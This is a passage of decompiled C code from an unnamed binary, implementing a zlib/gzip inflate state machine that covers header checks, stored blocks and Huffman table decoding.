							if(_t645 != 0) {
								L297:
								return _t645;
							} else {
								L319:
								return 0xfffffffb;
							}
						}
					}
					goto L321;
					L154:
					_t815 = _t814 >> 5;
					_t1018[0x18] = (_t814 & 0x0000001f) + 0x101;
					_t816 = _t815 >> 5;
					_t626 = (_t815 & 0x0000001f) + 1;
					_t814 = _t816 >> 4;
					_t1023 = _t1023 - 0xe;
					_t1018[0x19] = _t626;
					_t1018[0x17] = (_t816 & 0x0000000f) + 4;
					if(_t1018[0x18] > 0x11e || _t626 > 0x1e) {
						L26:
						( *(_t1036 + 0x40))[6] = 0x41d338;
						goto L294;
					} else {
						L156:
						_t1018[0x1a] = 0;
						 *_t1018 = 0x10;
						L157:
						if(_t1018[0x1a] >= _t1018[0x17]) {
							L163:
							while(_t1018[0x1a] < 0x13) {
								L165:
								 *((short*)(_t1018 + 0x70 + ( *(0x41e468 + _t1018[0x1a] * 2) & 0x0000ffff) * 2)) = 0;
								_t1018[0x1a] = _t1018[0x1a] + 1;
							}
							L166:
							_t654 =  &(_t1018[0x14c]);
							_t1018[0x1b] = _t654;
							_t1018[0x13] = _t654;
							_t1018[0x15] = 7;
							_t657 = E00408C60(0,  &(_t1018[0x1c]), 0x13,  &(_t1018[0x1b]),  &(_t1018[0x15]),  &(_t1018[0xbc]));
							_t998 =  *(_t1036 + 0x28);
							_t1036 = _t1036 + 0x18;
							 *(_t1036 + 0x30) = _t657;
							if(_t657 != 0) {
								L293:
								( *(_t1036 + 0x40))[6] = 0x41d338;
								goto L294;
							} else {
								L167:
								_t1018[0x1a] = _t657;
								 *_t1018 = 0x11;
								L168:
								if(_t1018[0x1a] >= _t1018[0x19] + _t1018[0x18]) {
									L201:
									if( *_t1018 == 0x1b) {
										goto L295;
									} else {
										L202:
										_t660 =  &(_t1018[0x14c]);
										_t1018[0x1b] = _t660;
										_t1018[0x13] = _t660;
										_t1018[0x15] = 9;
										_t662 = E00408C60(1,  &(_t1018[0x1c]), _t1018[0x18],  &(_t1018[0x1b]),  &(_t1018[0x15]),  &(_t1018[0xbc]));
										_t1036 = _t1036 + 0x18;
										 *(_t1036 + 0x30) = _t662;
										if(_t662 == 0) {
											L204:
											_t1018[0x14] = _t1018[0x1b];
											_t1018[0x16] = 6;
											_t665 = E00408C60(2, _t1018 + 0x70 + _t1018[0x18] * 2, _t1018[0x19],  &(_t1018[0x1b]),  &(_t1018[0x16]),  &(_t1018[0xbc]));
											_t998 =  *(_t1036 + 0x28);
											_t1036 = _t1036 + 0x18;
											 *(_t1036 + 0x30) = _t665;
											if(_t665 == 0) {
												L206:
												 *_t1018 = 0x12;
												goto L207;
											} else {
												L205:
												( *(_t1036 + 0x40))[6] = 0x41d338;
												goto L294;
											}
										} else {
											L203:
											_t998 =  *(_t1036 + 0x10);
											( *(_t1036 + 0x40))[6] = 0x41d338;
											L294:
											 *_t1018 = 0x1b;
											while(1) {
												L295:
												_t623 =  *_t1018;
												if(_t623 > 0x1c) {
													break;
												}
												L1:
												switch( *((intOrPtr*)(_t623 * 4 +  &M004087C4))) {
													case 0:
														L2:
														if(_t1018[2] != 0) {
															L4:
															if(_t1023 >= 0x10) {
																L8:
																if((_t1018[2] & 0x00000002) == 0 || _t814 != 0x8b1f) {
																	_t628 = _t1018[8];
																	_t1018[4] = 0;
																	if(_t628 != 0) {
																		 *((intOrPtr*)(_t628 + 0x30)) = 0xffffffff;
																	}
																	L13:
																	if((_t1018[2] & 0x00000001) == 0 || (((_t814 & 0x000000ff) << 8) + (_t814 >> 8)) % 0x1f != 0) {
																		( *(_t1036 + 0x40))[6] = 0x41d338;
																		goto L294;
																	} else {
																		L15:
																		if((_t814 & 0x0000000f) == 8) {
																			L17:
																			_t814 = _t814 >> 4;
																			_t848 = (_t814 & 0x0000000f) + 8;
																			_t1023 = _t1023 - 4;
																			if(_t848 <= _t1018[9]) {
																				_push(0);
																				_push(0);
																				_push(0);
																				_t1018[5] = 1 << _t848;
																				_t633 = E004024A0();
																				_t998 =  *(_t1036 + 0x1c);
																				_t1018[6] = _t633;
																				 *( *((intOrPtr*)(_t1036 + 0x4c)) + 0x30) = _t633;
																				 *_t1018 =  !(_t814 >> 8) & 0x00000002 | 0x00000009;
																				_t1036 = _t1036 + 0xc;
																				_t814 = 0;
																				_t1023 = 0;
																			} else {
																				_t998 =  *(_t1036 + 0x10);
																				goto L293;
																			}
																		} else {
																			_t998 =  *(_t1036 + 0x10);
																			( *(_t1036 + 0x40))[6] = 0x41d338;
																			goto L294;
																		}
																	}
																} else {
																	_t1018[6] = E00403080(0, 0, 0);
																	 *(_t1036 + 0x2c) = 0x1f;
																	 *(_t1036 + 0x2d) = 0x8b;
																	_t636 = E00403080(_t1018[6], _t1036 + 0x2c, 2);
																	_t998 =  *(_t1036 + 0x28);
																	_t1036 = _t1036 + 0x18;
																	_t814 = 0;
																	_t1018[6] = _t636;
																	_t1023 = 0;
																	 *_t1018 = 1;
																}
																goto L295;
															} else {
																L6:
																while(_t998 != 0) {
																	_t652 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t652;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < 0x10) {
																		continue;
																	} else {
																		goto L8;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															 *_t1018 = 0xc;
															goto L295;
														}
														goto L321;
													case 1:
														L21:
														if(__esi >= 0x10) {
															L24:
															 *(__edi + 0x10) = __ebx;
															if(__bl != 8) {
																goto L293;
															} else {
																L25:
																if((__ebx & 0x0000e000) == 0) {
																	L27:
																	__eax =  *(__edi + 0x20);
																	if(__eax != 0) {
																		__ebx = __ebx >> 8;
																		__ecx = __ebx >> 0x00000008 & 0x00000001;
																		 *__eax = __ebx >> 0x00000008 & 0x00000001;
																	}
																	if(( *(__edi + 0x10) & 0x00000200) != 0) {
																		 *(__esp + 0x1c) = __bl;
																		__ebx = __ebx >> 8;
																		__edx = __esp + 0x20;
																		 *(__esp + 0x21) = __bl;
																		__eax =  *(__edi + 0x18);
																		__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																		__edx =  *(__esp + 0x1c);
																		 *(__edi + 0x18) = __eax;
																	}
																	__ebx = 0;
																	__esi = 0;
																	 *__edi = 2;
																	goto L34;
																} else {
																	goto L26;
																}
															}
														} else {
															L22:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x10) {
																	continue;
																} else {
																	goto L24;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 2:
														L32:
														if(__esi >= 0x20) {
															L36:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 4) = __ebx;
															}
															if(( *(__edi + 0x10) & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __bl;
																__ecx = __ebx;
																__edx = __ebx;
																__ecx = __ebx >> 8;
																__edx = __ebx >> 0x10;
																__ebx = __ebx >> 0x18;
																__eax = __esp + 0x20;
																 *(__esp + 0x21) = __cl;
																 *((char*)(__esp + 0x22)) = __dl;
																 *(__esp + 0x23) = __bl;
																__ecx =  *(__edi + 0x18);
																__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 4);
																__edx =  *(__esp + 0x1c);
																 *(__edi + 0x18) = __eax;
															}
															__ebx = 0;
															__esi = 0;
															 *__edi = 3;
															goto L43;
														} else {
															L33:
															L34:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L36;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 3:
														L41:
														if(__esi >= 0x10) {
															L45:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																__ebx = __ebx & 0x000000ff;
																 *(__eax + 8) = __ebx & 0x000000ff;
																__ecx =  *(__edi + 0x20);
																__eax = __ebx;
																__eax = __ebx >> 8;
																 *( *(__edi + 0x20) + 0xc) = __eax;
															}
															if(( *(__edi + 0x10) & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __bl;
																__ebx = __ebx >> 8;
																__edx = __esp + 0x20;
																 *(__esp + 0x21) = __bl;
																__eax =  *(__edi + 0x18);
																__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																__edx =  *(__esp + 0x1c);
																 *(__edi + 0x18) = __eax;
															}
															__ebx = 0;
															__esi = 0;
															 *__edi = 4;
															goto L50;
														} else {
															L42:
															L43:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x10) {
																	continue;
																} else {
																	goto L45;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 4:
														L50:
														if(( *(__edi + 0x10) & 0x00000400) == 0) {
															L59:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x10) = 0;
															}
															goto L61;
														} else {
															L51:
															if(__esi >= 0x10) {
																L54:
																__eax =  *(__edi + 0x20);
																 *(__edi + 0x40) = __ebx;
																if(__eax != 0) {
																	 *(__eax + 0x14) = __ebx;
																}
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	 *(__esp + 0x1c) = __bl;
																	__ebx = __ebx >> 8;
																	__ecx = __esp + 0x20;
																	 *(__esp + 0x21) = __bl;
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__ebx = 0;
																__esi = 0;
																L61:
																 *__edi = 5;
																goto L62;
															} else {
																L52:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 0x10) {
																		continue;
																	} else {
																		goto L54;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 5:
														L62:
														if(( *(__edi + 0x10) & 0x00000400) == 0) {
															L75:
															 *(__edi + 0x40) = 0;
															 *__edi = 6;
															goto L76;
														} else {
															L63:
															__eax =  *(__edi + 0x40);
															 *(__esp + 0x14) = __eax;
															if(__eax > __edx) {
																__eax = __edx;
																 *(__esp + 0x14) = __edx;
															}
															if(__eax != 0) {
																__ecx =  *(__edi + 0x20);
																if(__ecx != 0) {
																	__ecx =  *(__ecx + 0x10);
																	 *(__esp + 0x34) = __ecx;
																	if(__ecx != 0) {
																		 *(__edi + 0x20) =  *( *(__edi + 0x20) + 0x14);
																		__ecx =  *( *(__edi + 0x20) + 0x14) -  *(__edi + 0x40);
																		__edx =  *(__edi + 0x20);
																		__edx =  *( *(__edi + 0x20) + 0x18);
																		 *(__esp + 0x20) = __ecx;
																		if(__ecx > __edx) {
																			__eax = __edx;
																		}
																		__edx =  *(__esp + 0x34);
																		__eax =  *(__esp + 0x24);
																		__edx =  *(__esp + 0x34) +  *(__esp + 0x24);
																		__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x34) +  *(__esp + 0x24), __ebp,  *(__esp + 0x24));
																		__eax =  *(__esp + 0x20);
																		__edx =  *(__esp + 0x1c);
																	}
																}
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																	__eax =  *(__esp + 0x20);
																}
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
																 *(__esp + 0x10) = __edx;
															}
															if( *(__edi + 0x40) != 0) {
																goto L303;
															} else {
																goto L75;
															}
														}
														goto L321;
													case 6:
														L76:
														if(( *(__edi + 0x10) & 0x00000800) == 0) {
															L89:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x1c) = 0;
															}
															goto L91;
														} else {
															L77:
															if(__edx == 0) {
																goto L303;
															} else {
																L78:
																__eax = 0;
																while(1) {
																	L79:
																	__ecx = __ebp[__eax] & 0x000000ff;
																	 *(__esp + 0x14) = __eax;
																	__eax =  *(__edi + 0x20);
																	 *(__esp + 0x20) = __ecx;
																	if(__eax != 0) {
																		__ecx =  *(__eax + 0x1c);
																		 *(__esp + 0x34) = __ecx;
																		if(__ecx != 0) {
																			__ecx =  *(__edi + 0x40);
																			if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
																				__edx =  *(__esp + 0x34);
																				 *((char*)( *(__esp + 0x34) + __ecx)) =  *(__esp + 0x20);
																				 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																				__edx =  *(__esp + 0x10);
																			}
																		}
																	}
																	if( *(__esp + 0x20) == 0) {
																		break;
																	}
																	L84:
																	__eax =  *(__esp + 0x14);
																	if(__eax < __edx) {
																		continue;
																	}
																	break;
																}
																L85:
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__eax =  *(__esp + 0x14);
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__esp + 0x10) = __edx;
																if( *(__esp + 0x20) != 0) {
																	goto L303;
																} else {
																	L88:
																	L91:
																	 *(__edi + 0x40) = 0;
																	 *__edi = 7;
																	goto L92;
																}
															}
														}
														goto L321;
													case 7:
														L92:
														if(( *(__edi + 0x10) & 0x00001000) == 0) {
															L105:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 0x24) = 0;
															}
															goto L107;
														} else {
															L93:
															if(__edx == 0) {
																goto L303;
															} else {
																L94:
																__eax = 0;
																while(1) {
																	L95:
																	__ecx = __ebp[__eax] & 0x000000ff;
																	 *(__esp + 0x14) = __eax;
																	__eax =  *(__edi + 0x20);
																	 *(__esp + 0x20) = __ecx;
																	if(__eax != 0) {
																		__ecx =  *(__eax + 0x24);
																		 *(__esp + 0x34) = __ecx;
																		if(__ecx != 0) {
																			__ecx =  *(__edi + 0x40);
																			if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
																				__edx =  *(__esp + 0x34);
																				 *((char*)( *(__esp + 0x34) + __ecx)) =  *(__esp + 0x20);
																				 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																				__edx =  *(__esp + 0x10);
																			}
																		}
																	}
																	if( *(__esp + 0x20) == 0) {
																		break;
																	}
																	L100:
																	__eax =  *(__esp + 0x14);
																	if(__eax < __edx) {
																		continue;
																	}
																	break;
																}
																L101:
																if(( *(__edi + 0x10) & 0x00000200) != 0) {
																	__ecx =  *(__esp + 0x14);
																	__edx =  *(__edi + 0x18);
																	__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
																	__edx =  *(__esp + 0x1c);
																	 *(__edi + 0x18) = __eax;
																}
																__eax =  *(__esp + 0x14);
																__edx = __edx - __eax;
																__ebp =  &(__ebp[__eax]);
																 *(__esp + 0x10) = __edx;
																if( *(__esp + 0x20) != 0) {
																	goto L303;
																} else {
																	L104:
																	L107:
																	 *__edi = 8;
																	goto L108;
																}
															}
														}
														goto L321;
													case 8:
														L108:
														if(( *(__edi + 0x10) & 0x00000200) == 0) {
															L115:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
																__ecx =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
																 *(__eax + 0x2c) =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
																__edx =  *(__edi + 0x20);
																 *( *(__edi + 0x20) + 0x30) = 1;
															}
															__eax = E00403080(0, 0, 0);
															__ecx =  *(__esp + 0x4c);
															__edx =  *(__esp + 0x1c);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x4c) + 0x30) = __eax;
															 *__edi = 0xb;
															goto L295;
														} else {
															L109:
															if(__esi >= 0x10) {
																L112:
																__ecx =  *(__edi + 0x18) & 0x0000ffff;
																if(__ebx == ( *(__edi + 0x18) & 0x0000ffff)) {
																	L114:
																	__ebx = 0;
																	__esi = 0;
																	goto L115;
																} else {
																	L113:
																	__eax =  *(__esp + 0x40);
																	 *(__eax + 0x18) = 0x41d338;
																	goto L294;
																}
																goto L295;
															} else {
																L110:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 0x10) {
																		continue;
																	} else {
																		goto L112;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 9:
														L118:
														if(__esi >= 0x20) {
															L122:
															__ebx = __ebx & 0x0000ff00;
															__ebx = __ebx << 0x10;
															__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
															__ebx = __ebx >> 8;
															__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
															__eax = __ebx >> 0x00000008 & 0x0000ff00;
															__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
															__eax = __ecx + __ebx;
															__ecx =  *(__esp + 0x40);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x40) + 0x30) = __eax;
															__ebx = 0;
															__esi = 0;
															 *__edi = 0xa;
															goto L123;
														} else {
															L119:
															L120:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L122;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0xa:
														L123:
														if( *((intOrPtr*)(__edi + 0xc)) == 0) {
															L298:
															__eax =  *(__esp + 0x40);
															__ecx =  *(__esp + 0x24);
															 *(__eax + 0xc) =  *(__esp + 0x24);
															__ecx =  *(__esp + 0x18);
															 *__eax = __ebp;
															 *(__eax + 0x10) =  *(__esp + 0x18);
															 *(__eax + 4) = __edx;
															 *(__edi + 0x3c) = __esi;
															_pop(__esi);
															_pop(__ebp);
															 *(__edi + 0x38) = __ebx;
															_pop(__ebx);
															__eax = 2;
															_pop(__edi);
															__esp = __esp + 0x2c;
															return 2;
														} else {
															L124:
															_push(0);
															_push(0);
															_push(0);
															__eax = E004024A0();
															__edx =  *(__esp + 0x4c);
															 *(__edi + 0x18) = __eax;
															 *( *(__esp + 0x4c) + 0x30) = __eax;
															__edx =  *(__esp + 0x1c);
															__esp = __esp + 0xc;
															 *__edi = 0xb;
															goto L125;
														}
														goto L321;
													case 0xb:
														L125:
														if( *((intOrPtr*)(__esp + 0x44)) == 5) {
															goto L303;
														} else {
															goto L126;
														}
														goto L321;
													case 0xc:
														L126:
														if( *(__edi + 4) == 0) {
															L128:
															if(__esi >= 3) {
																L132:
																__ecx = __ebx;
																__ebx = __ebx >> 1;
																__eax = __ebx;
																__ecx = __ecx & 0x00000001;
																__eax = __ebx & 0x00000003;
																__esi = __esi - 1;
																 *(__edi + 4) = __ecx;
																if(__eax > 3) {
																	L138:
																	__ebx = __ebx >> 2;
																	__esi = __esi - 2;
																} else {
																	L133:
																	switch( *((intOrPtr*)(__eax * 4 +  &M00408838))) {
																		case 0:
																			L134:
																			__ebx = __ebx >> 2;
																			 *__edi = 0xd;
																			__esi = __esi - 2;
																			goto L295;
																		case 1:
																			L135:
																			__eax = __edi;
																			__eax = E00407290(__edi);
																			__ebx = __ebx >> 2;
																			 *__edi = 0x12;
																			__esi = __esi - 2;
																			goto L295;
																		case 2:
																			L136:
																			__ebx = __ebx >> 2;
																			 *__edi = 0xf;
																			__esi = __esi - 2;
																			goto L295;
																		case 3:
																			L137:
																			__eax =  *(__esp + 0x40);
																			 *(__eax + 0x18) = 0x41d338;
																			 *__edi = 0x1b;
																			goto L138;
																	}
																}
																goto L295;
															} else {
																L129:
																L130:
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebp =  &(__ebp[1]);
																	__ebx = __ebx + __eax;
																	 *(__esp + 0x10) = __edx;
																	if(__esi < 3) {
																		continue;
																	} else {
																		goto L132;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															L127:
															__esi = __esi & 0x00000007;
															__ebx = __ebx >> __cl;
															__esi = __esi - (__esi & 0x00000007);
															 *__edi = 0x18;
															goto L295;
														}
														goto L321;
													case 0xd:
														L139:
														__esi = __esi & 0x00000007;
														__esi = __esi - (__esi & 0x00000007);
														__ebx = __ebx >> __cl;
														if(__esi >= 0x20) {
															L142:
															__ecx = __ebx;
															__eax = __ebx;
															__ecx =  !__ebx;
															__eax = __ebx & 0x0000ffff;
															__ecx =  !__ebx >> 0x10;
															if(__eax ==  !__ebx >> 0x10) {
																L144:
																__ebx = 0;
																 *(__edi + 0x40) = __eax;
																__esi = 0;
																 *__edi = 0xe;
																goto L145;
															} else {
																L143:
																__eax =  *(__esp + 0x40);
																 *(__eax + 0x18) = 0x41d338;
																goto L294;
															}
														} else {
															L140:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L142;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 0xe:
														L145:
														__eax =  *(__edi + 0x40);
														 *(__esp + 0x14) = __eax;
														if(__eax == 0) {
															goto L224;
														} else {
															L146:
															if(__eax > __edx) {
																__eax = __edx;
																 *(__esp + 0x14) = __edx;
															}
															__ecx =  *(__esp + 0x18);
															if(__eax > __ecx) {
																__eax = __ecx;
																 *(__esp + 0x14) = __eax;
															}
															if(__eax == 0) {
																goto L303;
															} else {
																L151:
																__ecx =  *(__esp + 0x14);
																__edx =  *(__esp + 0x24);
																__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x24), __ebp,  *(__esp + 0x14));
																__eax =  *(__esp + 0x20);
																 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
																 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
																 *(__esp + 0x30) =  *(__esp + 0x30) + __eax;
																__edx =  *(__esp + 0x1c);
																__ebp =  &(__ebp[__eax]);
																 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
																goto L295;
															}
														}
														goto L321;
													case 0xf:
														goto L0;
													case 0x10:
														goto L157;
													case 0x11:
														goto L168;
													case 0x12:
														L207:
														if(_t998 < 6 ||  *(_t1036 + 0x18) < 0x102) {
															L210:
															_t671 =  *(_t1018[0x13] + ((0x00000001 << _t1018[0x15]) - 0x00000001 & _t814) * 4);
															 *(_t1036 + 0x14) = _t671;
															if((_t671 >> 0x00000008 & 0x000000ff) <= _t1023) {
																L214:
																if(_t671 == 0 || (_t671 & 0x000000f0) != 0) {
																	L221:
																	_t864 = _t671 >> 0x00000008 & 0x000000ff;
																	_t814 = _t814 >> _t864;
																	_t1023 = _t1023 - _t864;
																	 *(_t1036 + 0x20) = _t864;
																	_t1018[0x10] = _t671 >> 0x10;
																	if(_t671 != 0) {
																		L223:
																		if((_t671 & 0x00000020) == 0) {
																			L225:
																			if((_t671 & 0x00000040) == 0) {
																				L227:
																				_t1018[0x12] = _t671 & 0xf;
																				 *_t1018 = 0x13;
																				goto L228;
																			} else {
																				L226:
																				( *(_t1036 + 0x40))[6] = 0x41d338;
																				goto L294;
																			}
																		} else {
																			L224:
																			 *_t1018 = 0xb;
																			goto L295;
																		}
																	} else {
																		L222:
																		 *_t1018 = 0x17;
																		goto L295;
																	}
																} else {
																	L216:
																	_t928 = _t671 >> 8;
																	 *(_t1036 + 0x34) = _t928;
																	 *(_t1036 + 0x20) = _t928 & 0x000000ff;
																	 *(_t1036 + 0x2c) = _t671;
																	_t738 =  *(_t1018[0x13] + ((((0x00000001 << (_t671 & 0x000000ff) +  *(_t1036 + 0x20)) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x14) >> 0x10)) * 4);
																	 *(_t1036 + 0x14) = _t738;
																	if((_t738 >> 0x00000008 & 0x000000ff) + ( *(_t1036 + 0x34) & 0x000000ff) <= _t1023) {
																		L220:
																		_t937 =  *(_t1036 + 0x2d) & 0x000000ff;
																		_t671 =  *(_t1036 + 0x14);
																		_t814 = _t814 >> _t937;
																		_t1023 = _t1023 - _t937;
																		goto L221;
																	} else {
																		L217:
																		L218:
																		while(_t998 != 0) {
																			_t743 = ( *_t1029 & 0x000000ff) << _t1023;
																			_t939 =  *(_t1036 + 0x2c);
																			_t998 = _t998 - 1;
																			_t1023 = _t1023 + 8;
																			_t814 = _t814 + _t743;
																			_t744 = _t939 & 0x000000ff;
																			 *(_t1036 + 0x20) = _t744;
																			_t1029 =  &(_t1029[1]);
																			 *(_t1036 + 0x10) = _t998;
																			 *(_t1036 + 0x14) = 1;
																			if(( *(_t1018[0x13] + ((((0x00000001 << (_t939 & 0x000000ff) + _t744) - 0x00000001 & _t814) >>  *(_t1036 + 0x20)) + ( *(_t1036 + 0x2e) & 0x0000ffff)) * 4) >> 0x00000008 & 0x000000ff) +  *(_t1036 + 0x20) > _t1023) {
																				continue;
																			} else {
																				goto L220;
																			}
																			goto L321;
																		}
																		goto L303;
																	}
																}
															} else {
																L211:
																L212:
																while(_t998 != 0) {
																	_t756 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t814 = _t814 + _t756;
																	_t1029 =  &(_t1029[1]);
																	 *(_t1036 + 0x10) = _t998;
																	_t671 =  *(_t1018[0x13] + ((0x00000001 << _t1018[0x15]) - 0x00000001 & _t814) * 4);
																	 *(_t1036 + 0x14) = 1;
																	if(0xad > _t1023) {
																		continue;
																	} else {
																		goto L214;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															L209:
															_t761 =  *(_t1036 + 0x40);
															_t761[4] =  *(_t1036 + 0x18);
															_t761[3] =  *(_t1036 + 0x24);
															_push( *(_t1036 + 0x28));
															 *_t761 = _t1029;
															_t761[1] =  *(_t1036 + 0x10);
															_push(_t761);
															_t1018[0xe] = _t814;
															_t1018[0xf] = _t1023;
															E00406CA0();
															_t763 =  *(_t1036 + 0x48);
															_t1029 =  *_t763;
															_t764 = _t763[1];
															_t814 = _t1018[0xe];
															_t1023 = _t1018[0xf];
															 *(_t1036 + 0x20) = _t763[4];
															_t1036 = _t1036 + 8;
															 *(_t1036 + 0x24) = _t763[3];
															 *(_t1036 + 0x10) = _t764;
															_t998 = _t764;
															goto L295;
														}
														goto L321;
													case 0x13:
														L228:
														_t672 = _t1018[0x12];
														if(_t672 == 0) {
															L234:
															 *_t1018 = 0x14;
															goto L235;
														} else {
															L229:
															if(_t1023 >= _t672) {
																L233:
																_t925 = _t1018[0x12];
																_t1018[0x10] = _t1018[0x10] + ((0x00000001 << _t925) - 0x00000001 & _t814);
																_t814 = _t814 >> _t925;
																_t1023 = _t1023 - _t925;
																goto L234;
															} else {
																L230:
																L231:
																while(_t998 != 0) {
																	_t729 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t729;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < _t1018[0x12]) {
																		continue;
																	} else {
																		goto L233;
																	}
																	goto L321;
																}
																goto L303;
															}
														}
														goto L321;
													case 0x14:
														L235:
														_t678 =  *((intOrPtr*)(_t1018[0x14] + ((0x00000001 << _t1018[0x16]) - 0x00000001 & _t814) * 4));
														 *(_t1036 + 0x14) = _t678;
														if((_t678 >> 0x00000008 & 0x000000ff) <= _t1023) {
															L239:
															if((_t678 & 0x000000f0) != 0) {
																L244:
																_t876 = _t678 >> 0x00000008 & 0x000000ff;
																_t814 = _t814 >> _t876;
																_t1023 = _t1023 - _t876;
																 *(_t1036 + 0x20) = _t876;
																if((_t678 & 0x00000040) == 0) {
																	L246:
																	_t1018[0x11] = _t678 >> 0x10;
																	_t1018[0x12] = _t678 & 0xf;
																	 *_t1018 = 0x15;
																	goto L247;
																} else {
																	L245:
